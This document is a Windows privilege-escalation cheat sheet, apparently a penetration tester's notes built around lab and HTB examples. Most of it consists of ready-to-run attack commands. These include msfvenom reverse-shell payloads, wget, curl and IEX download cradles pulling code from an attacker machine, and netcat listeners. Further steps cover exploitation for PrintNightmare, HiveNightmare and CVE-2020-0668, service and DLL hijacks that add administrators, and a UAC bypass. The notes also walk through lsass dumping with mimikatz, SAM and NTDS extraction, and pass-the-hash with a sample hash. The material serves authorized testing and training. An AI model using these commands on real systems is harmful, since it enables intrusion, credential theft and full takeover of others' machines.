Privilege Escalation
Last updated
Last updated
You can do some manual enumeration using Windows CMD
You can also do automatic enumeration using dedicated tools (see the tools below)
See an example of a privesc with a kernel exploit in this writeup
Enumerate win version / patch level (systeminfo)
Find matching exploits (Google, ExploitDB, GIthub)
Compile and run
ATTENTION: Kernel exploits are often unstable and could crash the system
MS08-067 - vulnerability in the "Server" service
MS17-010 - EternalBlue - remote code execution vulnerability
CVE-2021-36934 HiveNightmare - SeriousSam - Windows 10 flaw that results in ANY user having rights to read the Windows registry
icacls c:\Windows\System32\config\SAM check perm on SAM file
Exploit CVE-2021-36934 with this poc you will get hash and then will be able to get a shell for instance with psexec psexec.py INLANEFREIGHT/administrator@10.129.43.13 -hashes aad3b435b51404eeaad3b435b51404ee:7796ee39fd3a9c3a1844556115ae1a54
Check for spooler service using powershell ls \\localhost\pipe\spoolss
Add local admon with PrintNightmare with this Powershell PoC
Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "username" -NewPassword "password123!" -DriverName "PrintIt"
Check if it worked net user username
Check installed updates
Powershell systeminfo wmic qfe list brief Get-Hotfix
CMD with wmic wmic qfe list brief
CVE-2020-0668
Check out this blog post
Use this exploit
Download it
Open it with visual studio
Build it
Check for a third party serv that can be leverage. Check perm on a binary icacls "c:\path\to\leverage-bin.exe"
Generate a malicious file msfvenom -p windows/x64/meterpreter/reverse_https LHOST=ATTACK-IP LPORT=PORT -f exe > leverage-bin.exe
python3 -m http.server 80 serve the binary
Download 2 copy of the binary
wget http://ATTACK-IP/leverage-bin.exe -O leverage-bin.exe
wget http://ATTACK-IP/leverage-bin.exe -O leverage-bin2.exe
Run the exploit C:\CVE-2020-0668\CVE-2020-0668.exe C:\Users\user\Desktop\leverage-bin.exe "c:\path\to\leverage-bin.exe"
Check perm of new file icacls 'c:\path\to\leverage-bin.exe'
Replace with malicious binary copy /Y C:\Users\user\Desktop\leverage-bin2.exe "c:\path\to\leverage-bin.exe"
Use a Metasploit Resource Script
Make a file named handler.rc and put this in it
Launch metasploit this the resource script msfconsole -r handler.rc
Start the service net start leverage-serv
Even if we get an error we should have a reverse shell in meterpreter
WinPEAS WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts.
Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.
Seatbelt C# project for performing a wide variety of local privilege escalation checks
SharpUp C# version of PowerUp
Sherlock
Sherlock.ps1 is a powershell script that will give exploit related to the target.
It can also be found here on kali if empire is installed /usr/share/powershell-empire/empire/server/data/module_source/privesc/Sherlock.ps1
We can launch it with cmd like this (has to be served through an http server from the attacking machine)
echo IEX(New-Object Net.WebClient).DownloadString('http://ATTACK-MACHINE-IP/Sherlock.ps1') | powershell -noprofile -
Launch from Powershell
PowerUp
PowerUp is a powershell script for finding common Windows privilege escalation vectors that rely on misconfigurations. It can also be used to exploit some of the issues found.
JAWS
JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so 'should' run on every Windows version since Windows 7.
Exploit Suggesters
Windows Exploit Suggester is a python script that will provide the list of vulnerabilities the OS is vulnerable to using systeminfo Here is a blog post about wes next generation
Here is a convenient command in wes to grep specifically for privesc exploit and have an output in color python3 /opt/wesng/wes.py --color sysinfo.txt | grep -B 3 -A 5 "Privilege Vulnerability"
Metasploit Local Exploit Suggester
Precompiled kernel exploits
SessionGopher
SessionGopher is a PowerShell tool that finds and decrypts saved session information for remote access tools. It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information.
LaZagne
LaZagne is a tool used for retrieving passwords stored on a local machine from web browsers, chat tools, databases, Git, email, memory dumps, PHP, sysadmin tools, wireless network configurations, internal Windows password storage mechanisms, and more
Sysinternals Suite
Sysinternals Suite is a suite of tools that is used to monitor, manage and troubleshoot the Windows operating system owned by Microsoft. It is really useful for enumeration.
It can be useful to have precompiled binaries just ready to run
Abuse of the research methodology of executable of windows. We will try to place an excutable in a location windows will be looking.
We will need write permissions in an executable folder
Check if the binary path is unquoted, we can check a service using sc qc name-of-service
Check if we have writing rights with our user we can use accesschk .\accesschk64.exe /accepteula -uwdq "C:\Program Files\" we will have a list of user groups with read and write privs
Use msfvenom to generate an executable file msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACK-MACHINE-IP LPORT=7777 -f exe > executable_name.exe
Restart the service sc start service-name
Enumerate with automatic tools or this command: wmic service get name,displayname,pathname,startmode (it will list the running services)
Check if we can write in the folder of the service
powershell -ep bypass
. .\PowerUp.ps1
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
We place the executable in the folder of the program we wish to abuse
We start the vulnerable service in our example unquotedsvc sc start unquotedsvc
we should be added as an administrator we can verify this using net localgroup administrators
It is the possibility of running a command as another user
cmdkey /list
Check the writeup for Access on HTB here to have an example of privesc using runas
It is when you abuse the fact that a program runs automatically
OR
With PowerUp:
In a win cmd type powershell -ep bypass
Then . .\PowerUp.ps1 to load powerUp
In kali
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost Your-Kali-IP-Address
run
In another cmd tab msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe (give it the same name as the program that has autorun)
Take the program you created with msfvenom in your target (python HTTP server and then the browser in your target)
In your target
Place the program in the directory where the autorun program is
Wait for the administrator to log in
You should have a shell in your kali in Metasploit
If we have admin rights of a registry key in service we could use this to make an executable run with a service (add a user, get a shell, ...)
We will use this C script
We will modify the whoami command: system("whoami > c:\\windows\\temp\\service.txt"); we will add this instead cmd.exe /k net localgroup administrators user /add so our script now looks like this: system("cmd.exe /k net localgroup administrators user /add");
We will compile it x86_64-w64-mingw32-gcc windows_service.c -o x.exe
Let's now get the the exe file in our target (python http server -> browser in our target to dl the file) and put it where we have write rights (in the example it is going to be C:\Temp)
In a cmd from our target reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
Now we just need to start the service sc start regsvc
net localgroup administrators we can see that our user is now in the administrators group
Abusing an executable that we have permissions on
powershell -ep bypass
. .\PowerUp.ps1
OR
We will use this C script
We will modify the whoami command: system("whoami > c:\\windows\\temp\\service.txt"); we will add this instead cmd.exe /k net localgroup administrators user /add so our script now looks like this: system("cmd.exe /k net localgroup administrators user /add");
We will compile it x86_64-w64-mingw32-gcc windows_service.c -o x.exe
Let's now get the the exe file in our target (python http server -> browser in our target to dl the file) and put it where we have write rights (in the example it is going to be C:\Temp)
In the target cmd copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
sc start filepermsvc
Our user should be in the local administrators group
We will abuse a program that is launched on startup in which we have rights
The BUILTIN/Users group has full acces (F) to the Startup directory
In our attack machine msfconsole we launch Metasploit
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost IP-OF-OUR-ATTACK-MACHINE
run
In another tab msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP-OF-OUR-ATTACK-MACHINE -f exe -o x.exe
We serve the executable in our target (python http server -> and browse to it from our target)
We put the file in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" (If you are in the explorer you may have to type ProgramData in the path if it does not appear).
We wait for an admin to log in
DLL is a dynamic Library they often run with executables, when an executable runs the system will look for the dll and if the dll does not exist we could replace it with one of our own.
This will list the dll not found
We will need write access to the folder where the dll are missing
We are going to use windows_dll.c
Edit the file and modify the system command to add our user to the admin goup which would look like this: system("cmd.exe /k net localgroup administrators user /add");
We can now compile it x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
We serve it to our target (python http server -> browser of our target)
We put it in the path where the system will look for it, in our example it is the temp folder
We restart the service sc stop dllsvc & sc start dllsvc
Our user should be in the admin group now
PowerUP we should see the service exploitable under the [*] Checking service permissions
OR
We can use accesschk accesschk64.exe -wuvc Everyone *
sc config daclsvc binpath= "net localgroup administrators user /add"
sc start daclsvc
We should be added to the administrators group net localgroup administrators
whoami /priv the SeDebugPrivilege should be listed
procdump.exe -accepteula -ma lsass.exe lsass.dmp We will use ProcDump from the SysInternals suite to leverage this privilege and dump the lsass process memory.
We can launch mimikatz from our target
mimikatz.exe
log
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
And now we can take the hashes we need
If mimikatz does not work and if we have RDP we can dump lsass from the taskmanager (tab "Details" right click on the lsass process and select "Create dump file"
We can then take the dump to our attack machine et use pypykatz
pypykatz lsa minidump lsass.DMP
With this privilege, a user could take ownership of any file or object and make changes that could involve access to sensitive data, Remote Code Execution (RCE) or Denial-of-Service (DOS). In this case we need a file to target.
If necessary enable the privilege using this script
Import-Module .\Enable-Privilege.ps1
Take ownership of a flag using takeown `
Check the change of ownership worked PS C:\htb> Get-ChildItem -Path 'C:\Path\To\File' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}
Modify the file ACL with icalcs icacls 'C:\Path\To\File' /grant user:F
Use the file you have ownership now! :D
This allows us to copy a file from a folder
Here is a poc to abuse this
We need to import the libs Import-Module .\SeBackupPrivilegeUtils.dll and Import-Module .\SeBackupPrivilegeCmdLets.dll
We can now copy protected files and then use them Copy-FileSeBackupPrivilege 'c:\path\to\file\file.txt' .\file.txt
Copying NTDS.dit (for DC)
This group will also let us logging in locally to a domain controller.
NTDS is the active directory database it contains the ntlm hashes of all users and computers in the domain
We can use diskshadow to make a copy of the drive diskshadow.exe
Then we just need to copy it with the SeBackupPrivilege Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\paht\to\destination\ntds.dit
Backing up SAM and SYSTEM
reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV
Extract the creds
We can use secretdumps secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL or the ps module DSInternals
Note: We can also use robocopy to copy the files
net localgroup "Event Log Readers"
wevtutil qe Security /rd:true /f:text | Select-String "/user" search Security logs (credentials could be dropped this way)
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }} Another way to do the same thing
It is also worth to check PowerShell Operational logs
Using this group privileges, it is possible to use dnscmd to specify the path of a DLL plugin.
Get-ADGroupMember -Identity DnsAdmins to confirm group membership
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll we generate a dll with msfvenom that will add a user or we can make one that will get us a shell as admin msfvenom -p windows/shell/reverse_tcp LHOST=tun0 LPORT=4444 -f dll -o shell.dl
Do not forget to launch a listener if you use the reverse shell rlwrap nc -lnvp 4444
Serve the dll using python web server python3 -m http.server 80
Download the file in the target wget "http://Attacking-machine-IP/adduser.dll" -outfile "adduser.dll" (in powershell)
sc stop dns
sc start dns
net group "Domain Admins" /dom check that we have the priv (or catch the shell)
CVE-2018-0952
CVE-2019-0841
Has been mitigated since March 2020
We download this tool to enable the privilege. We need to add the few lines at the begining of the script
We can then compile it using cl.exe from a visual studio cmd cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
We then have to download the Capcom.sys driver file
We can then add the reference to the drive reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"
In powershell we check that the Capcom driver is not loaded with DriverView.exe
.\DriverView.exe /stext drivers.txt
cat drivers.txt | Select-String -pattern Capcom
Finally we can launch the exploit using ExploitCapcom.exe it will launch a shell as authority system
With this group you will get theSeBackupPrivilege and SeRestorePrivilege
sc qc AppReadiness
We can check permissions with sysinternals PsService
c:\PsService.exe security AppReadiness
Modify service binary path sc config AppReadiness binPath= "cmd /c net localgroup Administrators current-user /add"
sc start AppReadiness Start the service (will fail)
We should be in the Admin group net localgroup Administrators
We can now retrieve creds with crackmapexec crackmapexec smb IP-ADDRESS -u current-user -p 'current password'
Dump hash and pass secretsdump.py current-user@IP-ADDRESS -just-dc-user administrator
We can then get an admin shell using the found hashes psexec.py INLANEFREIGHT/administrator@IP-ADDRESS -hashes aad3b435b51404eeaad3b435b51404ee:7796ee39fd3a9c3a1844556115ae1a54
Checkout the Pentips on uac bypass here
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA confirm UAS is enabled
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin Checking UAC Level
If ConsentPromptBehaviorAdmin is 0x5 it means the highest UAC level of Always notify is enabled
[environment]::OSVersion.Version check win OS version compare with version history here
List of UAC bypass here
msfvenom -p windows/shell_reverse_tcp LHOST=IP_ADDRESS-OF_ATTACK_MACHINE LPORT=PORT -f dll > srrstr.dll generate a malicious dll
python3 -m http.server 80 serve it to the target
curl http://IP-ATTACK-MACHINE/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll" get it on the target
nc -lvnp CHOSEN-PORT launch listener
rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll run the dll to get the reverse shell back and check if uac is enabled for our current user
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe execute this to get an elevated shell
Pentips on abusing ACLs here
.\SharpUp.exe audit to enumerate
If you detect an executable that you could abuse you can check the permissions with icacls icacls "C:\Path\to\file.exe"
Make a back up of the original binary and replace it with a malicious one generated by msfvenom msfvenom -p windows/shell/reverse_tcp LHOST=tun0 LPORT=8888 -f exe > file.exe (instead of shell name it with the name of the executable that you are abusing
Set up a listener nc -lnvp 8888
cmd /c copy /Y file.exe "C:\Path\to\file.exe" copy the exec instead of the original one
sc start file start the service
Get your shell
If you want to exploit it by adding a user msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators user /add" -f exe > file.exe
.\SharpUp.exe audit to enumerate
Check permissions on the file you might be able to abuse using win internals AccessChk accesschk.exe /accepteula -quvcw service
sc config service binpath="cmd /c net localgroup administrators user /add" change the service binary path
sc stop service stop the service
sc start service start the service (it will fail but our exploit will work)
net localgroup administrators check that you user is now admin
To clean up
sc config WindScribeService binpath="C:\Path\to\service.exe" revert binary path
sc start service start the service
sc query service check that service is running
We can use SharpChrome to retrive cookies and saved logins from Google Chrome
We can use lazagne to dump passwords from the system .\lazagne.exe all
Capture traffic if wireshark is installed
Process monitoring
IEX (iwr 'http//IP-OF-ATTACK-MACHINE/procmon.ps1') execute the script from our target with the code hosted in our attacking machine
Vulnerable service abuse
Shell Command File on File Share to capture ntlmv2 pass hash.
We need an interesting share writable by our user accesschk -s -w C:\folder-of-shares
Create a malicious SCF file and name it with an @ at the start for example @Inventory.scf
We then just need to start Responder
sudo responder -wrf -v -I INTERFACE-USED (your interface can be tun0 for instance it has to be one reachable by the target)
Finally we can crack the found hash with hashcat hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
wmic qfe will show missing KBs
We can use Sherlock to find the vulnerabilities the target might have.
On powershell Set-ExecutionPolicy bypass -Scope process
Import-Module .\Sherlock.ps1
Find-AllVulns
Get a meterpreter shell
msfconsole
search smb_delivery you should see this one 0 exploit/windows/smb/smb_delivery 2016-07-26 excellent No SMB Delivery
use 0
show options set srvhost and lhost to your attack machine
set the target to DLL (show targets set target 0
exploit
Paste the comand shown on msf in the target
Receive the shell
Find a local privesc exploit
For example we can use CVE 2010-3338
on metasploit search 2010-3338 you should see 0 exploit/windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege Escalation
Migrate the process
Backgound the session background
set session 1
set lhost to your attacking machine IP
set lport to a free prot
exploit
You should get an elevated shell
Gather systeminfo and use windows exploit suggester
python2.7 windows-exploit-suggester.py --update this will dl a database file in xls format that you can use
python2.7 windows-exploit-suggester.py --database 2022-04-30-mssb.xls --systeminfo systeminfo
Example of MS16-032 with this poc
In Powershell Set-ExecutionPolicy bypass -scope process
Import-Module .\exploit.ps1
Invoke-MS16-032
We will get an elevated shell
Invoke-AllChecks
Check what programs have autorun using Windows internals - autorun see example below
Check that the program you found that allows FILE_ALL_ACCESS to Everyone using Windows internals - accesschk in our example we would type this in the cmd C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
Invoke-AllChecks
In a powershell prompt type Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
Invoke-AllChecks
If we know what program it is we can just do C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service" where File Permissions Service is the program we want to abuse
We can enumerate using Windows internals - icacls icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
We should have a shell in metasploit
We can find it using procmon, we need to add 2 filters "Result is NAME NOT FOUND" and "PATH ends with .dll"
Will list service we can write and to which everyone has access (in our example the service is daclsvc)
whoami /priv SeTakeOwnershipPrivilege should be listed
.\EnableAllTokenPrivs.ps1
whoami /priv to check if we have the SeBackupPrivilege
It is disabled so we can enable it with Set-SeBackupPrivilege
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll load custom dll (in CMD)
We need to check for the SeLoadDriverPrivilege in a cmd shell launched as admin whoami /priv
Now we need to check it has been enabled
